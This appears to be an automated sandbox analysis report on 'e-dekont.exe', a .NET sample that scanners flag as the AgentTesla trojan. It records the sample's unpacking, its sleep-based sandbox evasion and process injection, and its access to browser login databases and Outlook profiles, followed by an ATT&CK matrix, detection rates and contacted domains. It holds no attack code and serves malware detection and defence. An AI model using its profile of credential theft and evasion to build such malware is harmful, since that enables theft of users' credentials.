            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: dwrite.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: windowscodecs.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: version.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\e-dekont.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: e-dekont.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: e-dekont.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: e-dekont.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: wGVE.pdbSHA256S source: e-dekont.exe
            Source: Binary string: wGVE.pdb source: e-dekont.exe

            Data Obfuscation

            Source: e-dekont.exe, Form1.cs, .Net Code: InitializeComponent
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.cs, .Net Code: DV8ePiLWbw System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-dekont.exe.2b052b4.1.raw.unpack, HomeView.cs, .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.cs, .Net Code: DV8ePiLWbw System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-dekont.exe.73b0000.12.raw.unpack, HomeView.cs, .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.cs, .Net Code: DV8ePiLWbw System.Reflection.Assembly.Load(byte[])
            Source: e-dekont.exe, Static PE information: 0xFFD1EFAD [Sun Jan 3 07:54:21 2106 UTC]
            Source: C:\Users\user\Desktop\e-dekont.exe, Code function: 0_2_0295E460 pushfd ; retf 0_2_0295E461
            Source: C:\Users\user\Desktop\e-dekont.exe, Code function: 0_2_073F4507 pushad ; retf 0_2_073F4508
            Source: C:\Users\user\Desktop\e-dekont.exe, Code function: 0_2_073F44FD pushad ; retf 0_2_073F44FE
            Source: C:\Users\user\Desktop\e-dekont.exe, Code function: 2_2_02DC9770 push esp; ret 2_2_02DC9771
            Source: C:\Users\user\Desktop\e-dekont.exe, Code function: 2_2_06C0359F push es; iretd 2_2_06C0367C
            Source: C:\Users\user\Desktop\e-dekont.exe, Code function: 2_2_06C03621 push es; iretd 2_2_06C0367C
            Source: C:\Users\user\Desktop\e-dekont.exe, Code function: 2_2_06C09045 push es; ret 2_2_06C0904C
            Source: e-dekont.exe, Static PE information: section name: .text entropy: 7.955212716673103
            Source: C:\Users\user\Desktop\e-dekont.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\e-dekont.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\e-dekont.exe, Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match - File source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTR
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 2910000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 2AE0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 4AE0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 8960000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 9960000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 9B60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: AB60000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: AF50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: BF50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: CF50000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 2D80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 2FA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: 4FA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599543Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599202Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598437Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597446Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597328Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597219Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 597094Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596766Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596547Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeThread delayed: delay time: 594500Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeWindow / User API: threadDelayed 1400Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exeWindow / User API: threadDelayed 8446Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -28592453314249787s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7508Thread sleep count: 1400 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7508Thread sleep count: 8446 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599543s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599202s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597446s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -597094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -595063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-dekont.exe TID: 7504Thread sleep time: -594500s >= -30000sJump to behavior
            Source: e-dekont.exe, 00000002.00000002.4086663197.00000000011AB000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\e-dekont.exe - Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\e-dekont.exe - Code function: 2_2_05B4BE28 LdrInitializeThunk,2_2_05B4BE28
            Source: C:\Users\user\Desktop\e-dekont.exe - Process token adjusted: Debug
            Source: C:\Users\user\Desktop\e-dekont.exe - Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\e-dekont.exe Memory written: C:\Users\user\Desktop\e-dekont.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\e-dekont.exe Process created: C:\Users\user\Desktop\e-dekont.exe "C:\Users\user\Desktop\e-dekont.exe"
            Source: C:\Users\user\Desktop\e-dekont.exe Queries volume information: C:\Users\user\Desktop\e-dekont.exe VolumeInformation
            Source: C:\Users\user\Desktop\e-dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-dekont.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\e-dekont.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTR
            Source: C:\Users\user\Desktop\e-dekont.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\e-dekont.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\e-dekont.exe, File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\Desktop\e-dekont.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Remote Access Functionality

            Source: Yara match, File source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.4088425866.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

            Source | Detection | Scanner | Label
            e-dekont.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
            e-dekont.exe | 62% | Virustotal |
            e-dekont.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            reallyfreegeoip.org | 2% | Virustotal |
            scratchdreams.tk | 17% | Virustotal |
            checkip.dyndns.com | 0% | Virustotal |
            checkip.dyndns.org | 0% | Virustotal |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            reallyfreegeoip.org | 104.21.67.152 | true | false | | unknown
            scratchdreams.tk | 104.21.27.85 | true | false | | unknown
            checkip.dyndns.com | 158.101.44.242 | true | false | | unknown
            checkip.dyndns.org | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
            https://reallyfreegeoip.org/xml/154.16.105.36 | false | Avira URL Cloud: safe | unknown
